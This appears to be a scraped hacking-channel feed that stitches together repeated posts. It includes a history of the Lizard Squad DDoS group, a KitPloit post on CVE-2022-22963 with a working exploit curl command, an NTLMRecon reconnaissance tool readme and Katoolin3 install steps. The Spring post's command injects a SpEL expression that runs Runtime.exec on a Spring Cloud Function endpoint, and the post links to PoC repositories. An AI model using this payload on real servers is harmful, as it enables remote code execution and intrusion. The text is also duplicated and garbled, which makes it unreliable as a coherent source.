Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.
Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.Post Views: 24
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 7 Minutes
Lizard squad was a notorious hacking group that claimed responsibility for some of the biggest hacks and DDoS attacks in gaming history, including attacks on the Xbox and PlayStation networks.
They used to disrupt streamers, game events, and studios and many of its members have been arrested over the years. Lizard Squad proclaimed themselves to be the “kings” of DDoS attacks.
First Attack on PlayStation Network, League of Legends.
The attacks started in August 2014. Lizard Squad hackers launched their DDoS attacks first on the League of Legends servers taking them offline.
Then, they proceeded to launched DDoS attacks on the PlayStation Network, as well as on servers run by Blizzard. The attacks took the networks down for nearly a whole day, causing problems to gamers worldwide.
The news for the attacks was on the front page of all media around the world due to the magnitude of the people affected.
The FBI launched an investigation into the group when the attackers twitted a bomb threat against Sony’s executive, John Smedley, which forced the flight to be diverted, causing a nationwide hunt for the group.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-4-1.jpg
Lizard Squad bomb threat Tweet
A month later, in September 2014, the group launched DDoS attacks on Activision’s Destiny and call of Duty: Ghosts, as well as on EA’s FIFA, Sims 4.
Given the particular popularity of Destiny and their complete reliance on live servers, the problems caused were enormous, a lot of players were unable to login for hours.
Our first test: Parts of Destiny #offline
— Lizard Squad (@LizardSquad) September 20, 2014
Parts of Call Of Duty Ghosts #offline
— Lizard Squad (@LizardSquad) September 20, 2014
December Attacks
The majority of Lizard Squad’s online activity, outside hacking, comes via their Twitter account.
Following the attacks, the hacking group constantly provided information for their operations or threats while also claiming responsibility for the attacks through their twitter account.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/What-is-DDos-Attack-Xbox-Live-Down-Lizard-SquadPS4-Lizard-Squad-Attack-What-is-the-Lizard-Squad-Who-are-the-Lizard-Squad-UK-USA-339966.jpg
Lizard Squad Tweet about nationalcrimeagency.gov.uk going offline due to DDoS attack
Lizard Squad botnet is estimated that contained somewhere between 120K and 150K bots. From pcs and routers to fridges and other smart home devices.
Lizard Squad attacks went quite over October and November, preparing themselves for their largest attack yet.
On December 1st and 8th 2014, the hackers resurfaced, taking Xbox and PlayStation networks respectively offline again.
Xbox users reported that attempting to connect and use the service would give them an ‘80151909’ error code.
On December 2nd, the group hacked the machinima.com website and replaced their front page with the ASCII art of their logo.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/The-hack-of-Machinima-Inc.-covered-the-page-in-characters-to-make-the-shape-of-Lizard-Squads-Twitter-image.jpg
ASCII Lizard Squad logo on the defaced machinima.com website
After the attacks in December, the Twitter account of the Lizard Squad’s members warned that they would continue the att[...]
___________________________
@hacking_Attack
@Hacking_Video
Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.
Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.Post Views: 24
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Patreon.png
Reading Time: 7 Minutes
Lizard squad was a notorious hacking group that claimed responsibility for some of the biggest hacks and DDoS attacks in gaming history, including attacks on the Xbox and PlayStation networks.
They used to disrupt streamers, game events, and studios and many of its members have been arrested over the years. Lizard Squad proclaimed themselves to be the “kings” of DDoS attacks.
First Attack on PlayStation Network, League of Legends.
The attacks started in August 2014. Lizard Squad hackers launched their DDoS attacks first on the League of Legends servers taking them offline.
Then, they proceeded to launched DDoS attacks on the PlayStation Network, as well as on servers run by Blizzard. The attacks took the networks down for nearly a whole day, causing problems to gamers worldwide.
The news for the attacks was on the front page of all media around the world due to the magnitude of the people affected.
The FBI launched an investigation into the group when the attackers twitted a bomb threat against Sony’s executive, John Smedley, which forced the flight to be diverted, causing a nationwide hunt for the group.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/ezgif.com-gif-maker-4-1.jpg
Lizard Squad bomb threat Tweet
A month later, in September 2014, the group launched DDoS attacks on Activision’s Destiny and call of Duty: Ghosts, as well as on EA’s FIFA, Sims 4.
Given the particular popularity of Destiny and their complete reliance on live servers, the problems caused were enormous, a lot of players were unable to login for hours.
Our first test: Parts of Destiny #offline
— Lizard Squad (@LizardSquad) September 20, 2014
Parts of Call Of Duty Ghosts #offline
— Lizard Squad (@LizardSquad) September 20, 2014
December Attacks
The majority of Lizard Squad’s online activity, outside hacking, comes via their Twitter account.
Following the attacks, the hacking group constantly provided information for their operations or threats while also claiming responsibility for the attacks through their twitter account.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/What-is-DDos-Attack-Xbox-Live-Down-Lizard-SquadPS4-Lizard-Squad-Attack-What-is-the-Lizard-Squad-Who-are-the-Lizard-Squad-UK-USA-339966.jpg
Lizard Squad Tweet about nationalcrimeagency.gov.uk going offline due to DDoS attack
Lizard Squad botnet is estimated that contained somewhere between 120K and 150K bots. From pcs and routers to fridges and other smart home devices.
Lizard Squad attacks went quite over October and November, preparing themselves for their largest attack yet.
On December 1st and 8th 2014, the hackers resurfaced, taking Xbox and PlayStation networks respectively offline again.
Xbox users reported that attempting to connect and use the service would give them an ‘80151909’ error code.
On December 2nd, the group hacked the machinima.com website and replaced their front page with the ASCII art of their logo.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/The-hack-of-Machinima-Inc.-covered-the-page-in-characters-to-make-the-shape-of-Lizard-Squads-Twitter-image.jpg
ASCII Lizard Squad logo on the defaced machinima.com website
After the attacks in December, the Twitter account of the Lizard Squad’s members warned that they would continue the att[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees. | Black Hat Ethical Hacking
Lizard squad was a notorious Lizard squad that claimed responsibility for some of the biggest hacks and DDoS attacks in gaming history, including attacks on the Xbox and PlayStation networks.
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees. Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees.Post Views: 24 https://www…
acks on Christmas.
“That’s a small dose of what’s to come on Christmas,” reads their account, which later added: “Sony had it worse.”
Xbox Live #offline
— Lizard Squad (@LizardPatrol) December 2, 2014
On the 22nd of December, North’s Korea Internet access went dark. The mystery behind the motive of the 9,5-hour outage was still unknown until the members of the Lizard Squad claimed responsibility for the attack and linked an IP address located in North Korea.
Further attacks, Christmas attacks
On December 25, 2014, the Lizard Squad hackers who had previously threatened to take down gaming services on Christmas, followed through on their promise and launched DDoS attacks on the PlayStation Network and Xbox Live.
The attacks caused widespread anger among gamers around the world. The attacks stopped only when the Internet entrepreneur Kim Dotcom offer 3000 vouchers for his Mega cloud storage service, worth $99 each.
Attacks on Tor, Sybil attack, Malaysia Airlines
The group twitted that they were no longer attacking the gaming giants but on the Tor network.
To clarify, we are no longer attacking PSN or Xbox. We are testing our new Tor 0day.
— Lizard Squad (@LizardMafia) December 26, 2014
On December 26, the hacker group launched a Sybil attack, (A Sybil attack is a kind of security threat on an online system where one person tried to take over the network by creating multiple pseudonymous nodes, accounts, etc.) which involved more than 3000 relays against the Tor network.
‘LizardNSA’ nodes began appearing on the network.
In the first month of 2015, on January 26, the website of Malaysia Airlines was attacked by Lizard Squad, calling itself a ‘cyber caliphate’.
Users were getting redirected to another page with an image of a tuxedo-wearing lizard, and reading ‘Hacked by Cyber Caliphate’.
The page also had the headline ‘404 – Plane Not Found’, an apparent reference to the airline’s loss of flight MH370 the previous year.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/malaysia-airlines-website.jpg
404 – Plane Not Found – Defaced Malaysia Airlines website
Customer data were not compromised and the flight bookings didn’t get affected.
A new squad of hackers emerges, Finest Squad
A group known as the Finest Squad emerged in December of 2014 with the intention of bringing Lizard Squad’s actions to an end.
The Finest Squad members managed to break into the public Twitter accounts and websites of the Lizard Squad members and released their public information, such as names and photographs of them online.
The members of Lizard Squad went silent, and it is not yet clear how the Finest Squad members uncover their personal information.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/finest-squad.jpg
Finest Squad defaced Lizard’s Squad Website while also exposing members.
They also revealed how the Lizard hackers managed to take the video game networks down and even submitted information about the vulnerabilities discovered to the video game networks that were under attack.
Tweet – [https://twitter.com/FinestSquad/status/544154421580808192 ]
Known members arrests and names.
Julius Kivimäki, ‘zeekill’
Julius was a 17 years old Finish teenager at the time of conviction. He was convicted of 50700 charges related to computer crimes. The charges against Julius included data breaches, felony payment fraud, telecommunication harassment, and other counts related to fraud and violations of company secrets.
He received a two-year suspended sentence, undergoing monitoring of his online activities, but he didn’t serve any time in prison.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Julius-Kivimaki.jpg
Julius Kivimäki, ‘zeekill’ in a recent interview
Vinnie Omari
Vinnie was 22 at the time, and he was from Twickenham, south-west London. He claimed responsibility for the Christmas attacks, and he was arrested by the police in the UK.
Zachary Buchta – ‘fbiarelosers’
[...]
___________________________
@hacking_Attack
@Hacking_Video
“That’s a small dose of what’s to come on Christmas,” reads their account, which later added: “Sony had it worse.”
Xbox Live #offline
— Lizard Squad (@LizardPatrol) December 2, 2014
On the 22nd of December, North’s Korea Internet access went dark. The mystery behind the motive of the 9,5-hour outage was still unknown until the members of the Lizard Squad claimed responsibility for the attack and linked an IP address located in North Korea.
Further attacks, Christmas attacks
On December 25, 2014, the Lizard Squad hackers who had previously threatened to take down gaming services on Christmas, followed through on their promise and launched DDoS attacks on the PlayStation Network and Xbox Live.
The attacks caused widespread anger among gamers around the world. The attacks stopped only when the Internet entrepreneur Kim Dotcom offer 3000 vouchers for his Mega cloud storage service, worth $99 each.
Attacks on Tor, Sybil attack, Malaysia Airlines
The group twitted that they were no longer attacking the gaming giants but on the Tor network.
To clarify, we are no longer attacking PSN or Xbox. We are testing our new Tor 0day.
— Lizard Squad (@LizardMafia) December 26, 2014
On December 26, the hacker group launched a Sybil attack, (A Sybil attack is a kind of security threat on an online system where one person tried to take over the network by creating multiple pseudonymous nodes, accounts, etc.) which involved more than 3000 relays against the Tor network.
‘LizardNSA’ nodes began appearing on the network.
In the first month of 2015, on January 26, the website of Malaysia Airlines was attacked by Lizard Squad, calling itself a ‘cyber caliphate’.
Users were getting redirected to another page with an image of a tuxedo-wearing lizard, and reading ‘Hacked by Cyber Caliphate’.
The page also had the headline ‘404 – Plane Not Found’, an apparent reference to the airline’s loss of flight MH370 the previous year.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/malaysia-airlines-website.jpg
404 – Plane Not Found – Defaced Malaysia Airlines website
Customer data were not compromised and the flight bookings didn’t get affected.
A new squad of hackers emerges, Finest Squad
A group known as the Finest Squad emerged in December of 2014 with the intention of bringing Lizard Squad’s actions to an end.
The Finest Squad members managed to break into the public Twitter accounts and websites of the Lizard Squad members and released their public information, such as names and photographs of them online.
The members of Lizard Squad went silent, and it is not yet clear how the Finest Squad members uncover their personal information.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/finest-squad.jpg
Finest Squad defaced Lizard’s Squad Website while also exposing members.
They also revealed how the Lizard hackers managed to take the video game networks down and even submitted information about the vulnerabilities discovered to the video game networks that were under attack.
Tweet – [https://twitter.com/FinestSquad/status/544154421580808192 ]
Known members arrests and names.
Julius Kivimäki, ‘zeekill’
Julius was a 17 years old Finish teenager at the time of conviction. He was convicted of 50700 charges related to computer crimes. The charges against Julius included data breaches, felony payment fraud, telecommunication harassment, and other counts related to fraud and violations of company secrets.
He received a two-year suspended sentence, undergoing monitoring of his online activities, but he didn’t serve any time in prison.
https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Julius-Kivimaki.jpg
Julius Kivimäki, ‘zeekill’ in a recent interview
Vinnie Omari
Vinnie was 22 at the time, and he was from Twickenham, south-west London. He claimed responsibility for the Christmas attacks, and he was arrested by the police in the UK.
Zachary Buchta – ‘fbiarelosers’
[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
acks on Christmas. “That’s a small dose of what’s to come on Christmas,” reads their account, which later added: “Sony had it worse.” Xbox Live #offline — Lizard Squad (@LizardPatrol) December 2, 2014 On the 22nd of December, North’s Korea Internet access…
Zachary was 19 years old at the time of his arrest. He was from Maryland, and he was one of the members behind the DDoS attacks against multiple gaming networks. He was charged with computer crimes associated with a series of DDoS attacks, stolen credit cards, and selling DDoS-for-hire services.
Bradley Jan Willem van Rooy – ‘UchihaLS’
Bradley was also 19 years old at the time of his arrest. He was from the Netherlands and he was charged with the same charges as Zachary. He also was one of the managers behind the Twitter account of Lizard Squad.
Conclusion
While the video game industry is no longer stranger to anonymous online attacks, be they outright hacking, DDoS attacks, etc., the case of the Lizard Squad escalated dramatically with the bomb threat. Even if the video game industry suffers from its shared of toxic players and fans at times, rarely do things escalated to this level of harassment.
Playstation and Xbox’s networks seem to be more stabilized these days, with more robust and improved defenses for these kinds of attacks. Maybe one of the reasons behind the improved robustness of their network could be the Lizard Squad attacks and the scare it caused to the gaming community worldwide.
References:
⦿ What will happen to the Lizard Squad hackers? | Hacking | The Guardian
⦿ Who are Lizard Squad? The hackers who took down PSN, Xbox Live and Facebook
⦿ Lizard Squad Hack PlayStation and Xbox ⦿ Lizard Squad Hacker Who Shut Down PSN, Xbox Live, And An Airplane Will Face No Jail Time ⦿ Why Hacker Gang ‘Lizard Squad’ Took Down Xbox Live and PlayStation Network ⦿ Lizard Squad – Wikipedia Recent Articles* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Hide-data-in-images-and-extract-them-90x90.png Write up: Steganography: Hide data in images and extract them2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/MafiaBoy-the-hacker-who-took-down-the-Internet-90x90.png Hacking stories: MafiaBoy, the hacker who took down the Internet1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Detect-malicious-hacker-activities-on-endpoints-90x90.png Write up: Detect malicious hacker activities on endpoints1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Articles_Gallery-90x90.png How ILOVEYOU worm became the first global computer virus pandemic2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/Stuxnet-90x90.png Stuxnet – A weapon made out of code that almost started WW33 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/Article-90x90.png Hacking stories – Rafael Núñez (aka RaFa), hacking NASA with the hacking group: World of Hell5 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/10/operation-troy-90x90.png Hacking stories – Operation Troy – How researchers linked the cyberattacks5 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Operation-Aurora-90x90.png Hacking stories – Operation Aurora: When China hacked Google6 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/The-first-botnet-hijacker-90x90.png Hacking stories – The first botnet hijacker aka the Zombie King7 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/featured_image_jonathan_james_hacker-90x90.png Hacking Stories: Jonathan James – The teenager who hacked NASA for fun8 months ago
The post Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees. first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
Bradley Jan Willem van Rooy – ‘UchihaLS’
Bradley was also 19 years old at the time of his arrest. He was from the Netherlands and he was charged with the same charges as Zachary. He also was one of the managers behind the Twitter account of Lizard Squad.
Conclusion
While the video game industry is no longer stranger to anonymous online attacks, be they outright hacking, DDoS attacks, etc., the case of the Lizard Squad escalated dramatically with the bomb threat. Even if the video game industry suffers from its shared of toxic players and fans at times, rarely do things escalated to this level of harassment.
Playstation and Xbox’s networks seem to be more stabilized these days, with more robust and improved defenses for these kinds of attacks. Maybe one of the reasons behind the improved robustness of their network could be the Lizard Squad attacks and the scare it caused to the gaming community worldwide.
References:
⦿ What will happen to the Lizard Squad hackers? | Hacking | The Guardian
⦿ Who are Lizard Squad? The hackers who took down PSN, Xbox Live and Facebook
⦿ Lizard Squad Hack PlayStation and Xbox ⦿ Lizard Squad Hacker Who Shut Down PSN, Xbox Live, And An Airplane Will Face No Jail Time ⦿ Why Hacker Gang ‘Lizard Squad’ Took Down Xbox Live and PlayStation Network ⦿ Lizard Squad – Wikipedia Recent Articles* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Hide-data-in-images-and-extract-them-90x90.png Write up: Steganography: Hide data in images and extract them2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/MafiaBoy-the-hacker-who-took-down-the-Internet-90x90.png Hacking stories: MafiaBoy, the hacker who took down the Internet1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/02/Detect-malicious-hacker-activities-on-endpoints-90x90.png Write up: Detect malicious hacker activities on endpoints1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2022/01/Articles_Gallery-90x90.png How ILOVEYOU worm became the first global computer virus pandemic2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/Stuxnet-90x90.png Stuxnet – A weapon made out of code that almost started WW33 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/Article-90x90.png Hacking stories – Rafael Núñez (aka RaFa), hacking NASA with the hacking group: World of Hell5 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/10/operation-troy-90x90.png Hacking stories – Operation Troy – How researchers linked the cyberattacks5 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Operation-Aurora-90x90.png Hacking stories – Operation Aurora: When China hacked Google6 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/The-first-botnet-hijacker-90x90.png Hacking stories – The first botnet hijacker aka the Zombie King7 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/featured_image_jonathan_james_hacker-90x90.png Hacking Stories: Jonathan James – The teenager who hacked NASA for fun8 months ago
The post Lizard Squad – the infamous hacking group that brought Xbox and PlayStation networks to their knees. first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability
To run the vulnerable (https://www.kitploit.com/search/label/Vulnerable) SpringBoot application run this docker container (https://www.kitploit.com/search/label/Container) exposing (https://www.kitploit.com/search/label/Exposing) it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp (https://www.kitploit.com/search/label/Burp) suite:
___________________________
@hacking_Attack
@Hacking_Video
Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp (https://www.kitploit.com/search/label/Burp) suite:
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Credits https://github.com/hktalent/spring-spel-0day-poc
Download CVE-2022-22963 (https://github.com/darryk10/CVE-2022-22963)
___________________________
@hacking_Attack
@Hacking_Video
Download CVE-2022-22963 (https://github.com/darryk10/CVE-2022-22963)
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - hktalent/spring-spel-0day-poc: spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day…
spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963 - hktalent/spring-spel-0day-poc
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
NTLMRecon : Enumerate Information From NTLM Authentication Enabled Web Endpoints
NTLMRecon is a fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains.
NTLMRecon is built with flexibilty in mind. Need to run recon on a single URL, an IP address, an entire CIDR range or combination of all of it all put in a single input file? No problem! NTLMRecon got you covered. Read on.
NTLMRecon looks for NTLM enabled web endpoints, sends a fake authentication request and enumerates the following information from the NTLMSSP response:
* AD Domain Name
* Server name
* DNS Domain Name
* FQDN
* Parent DNS Domain
Since NTLMRecon leverages a python implementation of NTLMSSP, it eliminates the overhead of running Nmap NSE
On every successful discovery of a NTLM enabled web endpoint, the tool enumerates and saves information about the domain as follows to a CSV file :
URLDomain NameServer NameDNS Domain NameFQDNDNS Domainhttps://contoso.com/EWS/XCORPEXCHANGE01xcorp.contoso.netEXCHANGE01.xcorp.contoso.netcontoso.net InstallationBlackArchNTLMRecon is already packaged for BlackArch and can be installed by running
_ _ _
| \ | | | | | \/ || \
| | | | | | | | . . || |/ / _
| . ` | | | | | | |\/| || // _ \/ / _ | ‘_ \ | |\ | | | | || | | || |\ \ / (| () | | | | _| _/ _/ _/_| |/_| ___|______/|| || – @pwnfoo
v.0.4 beta – Y’all still exposing NTLM endpoints?
Bug Reports, Feature Requests : https://git.io/JIR5z
usage: ntlmrecon [-h] [–input INPUT | –infile INFILE] [–wordlist WORDLIST]
[–threads THREADS] [–output-type] [–outfile OUTFILE]
[–random-user-agent] [–force-all] [–shuffle] [-f]
optional arguments:
-h, –help show this help message and exit
–input INPUT, -i INPUT
Pass input as an IP address, URL or CIDR to enumerate
NTLM endpoints
–infile INFILE, -I INFILE
Pass input from a local file
–wordlist WORDLIST Override the internal wordlist with a custom wordlist
–threads THREADS Set number of threads (Default: 10)
–output-type, -o Set output type. JSON (TODO) and CSV supported
(Default: CSV)
–outfile OUTFILE, -O OUTFILE
Set output file name (Default: ntlmrecon.csv)
–random-user-agent TODO: Randomize user agents when sending requests
(Default: False)
–force-all Force enumerate all endpoints even if a valid endpoint
is found for a URL (Default : False)
–shuffle Break order of the input files
-f, –force Force replace output file if it already exists Example UsageRecon on a single URL
Input file can be something as mixed up as :
mail.contoso.com
CONTOSOHOSTNAME
10.0.13.2/28
192.168.222.1/24
https://mail.contoso.com
To run recon with an input file, just run :
$ ntlmrecon –infile /path/to/input/file –outfile ntlmrecon-fromfile.csv Download
___________________________
@hacking_Attack
@Hacking_Video
NTLMRecon : Enumerate Information From NTLM Authentication Enabled Web Endpoints
NTLMRecon is a fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains.
NTLMRecon is built with flexibilty in mind. Need to run recon on a single URL, an IP address, an entire CIDR range or combination of all of it all put in a single input file? No problem! NTLMRecon got you covered. Read on.
NTLMRecon looks for NTLM enabled web endpoints, sends a fake authentication request and enumerates the following information from the NTLMSSP response:
* AD Domain Name
* Server name
* DNS Domain Name
* FQDN
* Parent DNS Domain
Since NTLMRecon leverages a python implementation of NTLMSSP, it eliminates the overhead of running Nmap NSE
http-ntlm-infofor every successful discovery.On every successful discovery of a NTLM enabled web endpoint, the tool enumerates and saves information about the domain as follows to a CSV file :
URLDomain NameServer NameDNS Domain NameFQDNDNS Domainhttps://contoso.com/EWS/XCORPEXCHANGE01xcorp.contoso.netEXCHANGE01.xcorp.contoso.netcontoso.net InstallationBlackArchNTLMRecon is already packaged for BlackArch and can be installed by running
pacman -S ntlmreconArchIf you’re on Arch Linux or any Arch linux based distribution, you can grab the latest build from the Arch User Repository. Build from source* Clone the repository : git clone https://github.com/pwnfoo/ntlmrecon/* RECOMMENDED – Install virtualenv : pip install virtualenv* Start a new virtual environment : virtualenv venvand activate it with source venv/bin/activate* Run the setup file : python setup.py install* Run ntlmrecon : ntlmrecon --helpUsage$ ntlmrecon –help_ _ _
| \ | | | | | \/ || \
| | | | | | | | . . || |/ / _
| . ` | | | | | | |\/| || // _ \/ / _ | ‘_ \ | |\ | | | | || | | || |\ \ / (| () | | | | _| _/ _/ _/_| |/_| ___|______/|| || – @pwnfoo
v.0.4 beta – Y’all still exposing NTLM endpoints?
Bug Reports, Feature Requests : https://git.io/JIR5z
usage: ntlmrecon [-h] [–input INPUT | –infile INFILE] [–wordlist WORDLIST]
[–threads THREADS] [–output-type] [–outfile OUTFILE]
[–random-user-agent] [–force-all] [–shuffle] [-f]
optional arguments:
-h, –help show this help message and exit
–input INPUT, -i INPUT
Pass input as an IP address, URL or CIDR to enumerate
NTLM endpoints
–infile INFILE, -I INFILE
Pass input from a local file
–wordlist WORDLIST Override the internal wordlist with a custom wordlist
–threads THREADS Set number of threads (Default: 10)
–output-type, -o Set output type. JSON (TODO) and CSV supported
(Default: CSV)
–outfile OUTFILE, -O OUTFILE
Set output file name (Default: ntlmrecon.csv)
–random-user-agent TODO: Randomize user agents when sending requests
(Default: False)
–force-all Force enumerate all endpoints even if a valid endpoint
is found for a URL (Default : False)
–shuffle Break order of the input files
-f, –force Force replace output file if it already exists Example UsageRecon on a single URL
$ ntlmrecon --input https://mail.contoso.com --outfile ntlmrecon.csvRecon on a CIDR range or IP address$ ntlmrecon --input 192.168.1.1/24 --outfile ntlmrecon-ranges.csvRecon on an input fileThe tool automatically detects the type of input per line and takes actions accordingly. CIDR ranges are expanded by default (please note that there is no de-duplication baked in just yet!)Input file can be something as mixed up as :
mail.contoso.com
CONTOSOHOSTNAME
10.0.13.2/28
192.168.222.1/24
https://mail.contoso.com
To run recon with an input file, just run :
$ ntlmrecon –infile /path/to/input/file –outfile ntlmrecon-fromfile.csv Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
NTLMRecon : Enumerate Information From NTLM Authentication EWE
NTLMRecon is a fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Katoolin3 : Get Your Favourite Kali Linux Tools On Debian/Ubuntu/Linux Mint
Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.
This program is a port of katoolin from LionSec to python3. Katoolin3 offers several improvements over katoolin:
* Up to date packages
The old katoolin uses an outdated package list. Katoolin3 always keeps its package list up to date.
(Last updated: 18 Feb 2020)
* Improved handling of missing packages
The old katoolin breaks if a package isn’t available in the repositories anymore. Katoolin3 detects those and simply ignores them.
* Removal of packages
You can now remove all packages installed by katoolin3 (individually or all at once).
* Upgrading wont break your system anymore
…because the Kali repositories only get enabled during the runtime of katoolin3.
* Better utilization of the APT ecosystem
The old katoolin does potentially dangerous operations such as modifying and deleting important system configuration files. This has been changed.
* Easier maintenance of Kalis packages
The old katoolin makes it difficult to add new packages to the package list due to the way katoolin was programmed. Maintaining the package list is now a lot easier.
* Cleaner code
Due to poor code quality katoolin was unmaintainable and had to be rewritten from scratch. katoolin3 aims to be more readable and easier to maintain. Warning for Ubuntu usersInstalling programs from repositories for different operating systems is generally considered dangerous!
Some packages might (and probably will) break your system. Be careful when installing the tools and don’t blame katoolin3 for any inconveniences.
The optimal solution is to install specific tools from tools.kali.org.
It is not recommended to install all tools. Requirements* apt as a package manager
* Python >= 3.5
* Root privileges
* sh, bash
* python3-apt Installationgit clone https://github.com/s-h-3-l-l/katoolin3;
cd katoolin3;
chmod +x ./install.sh;
sudo ./install.sh;
Important: If you get the error
0) …
1) …
2) … Installing toolsTo install a package enter the corresponding number. To install multiple packages at once specify a range like
E.g. if you want to install some tools related to SQL injections you can go into the search menu and search for
If you want to have specific information about a package just enter the package name in the same search menu.
For more functionalities see the help dialogue inside the program. UpdatingTo update your tool list execute
chmod +x ./update.sh;
sudo ./update.sh; UninstallingTo uninstall katoolin3 execute
chmod +x ./uninstall.sh;
sudo ./uninstall.sh;
Uninstalling the Kali tools can be done inside katoolin3. Download
___________________________
@hacking_Attack
@Hacking_Video
Katoolin3 : Get Your Favourite Kali Linux Tools On Debian/Ubuntu/Linux Mint
Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.
This program is a port of katoolin from LionSec to python3. Katoolin3 offers several improvements over katoolin:
* Up to date packages
The old katoolin uses an outdated package list. Katoolin3 always keeps its package list up to date.
(Last updated: 18 Feb 2020)
* Improved handling of missing packages
The old katoolin breaks if a package isn’t available in the repositories anymore. Katoolin3 detects those and simply ignores them.
* Removal of packages
You can now remove all packages installed by katoolin3 (individually or all at once).
* Upgrading wont break your system anymore
…because the Kali repositories only get enabled during the runtime of katoolin3.
* Better utilization of the APT ecosystem
The old katoolin does potentially dangerous operations such as modifying and deleting important system configuration files. This has been changed.
* Easier maintenance of Kalis packages
The old katoolin makes it difficult to add new packages to the package list due to the way katoolin was programmed. Maintaining the package list is now a lot easier.
* Cleaner code
Due to poor code quality katoolin was unmaintainable and had to be rewritten from scratch. katoolin3 aims to be more readable and easier to maintain. Warning for Ubuntu usersInstalling programs from repositories for different operating systems is generally considered dangerous!
Some packages might (and probably will) break your system. Be careful when installing the tools and don’t blame katoolin3 for any inconveniences.
The optimal solution is to install specific tools from tools.kali.org.
It is not recommended to install all tools. Requirements* apt as a package manager
* Python >= 3.5
* Root privileges
* sh, bash
* python3-apt Installationgit clone https://github.com/s-h-3-l-l/katoolin3;
cd katoolin3;
chmod +x ./install.sh;
sudo ./install.sh;
Important: If you get the error
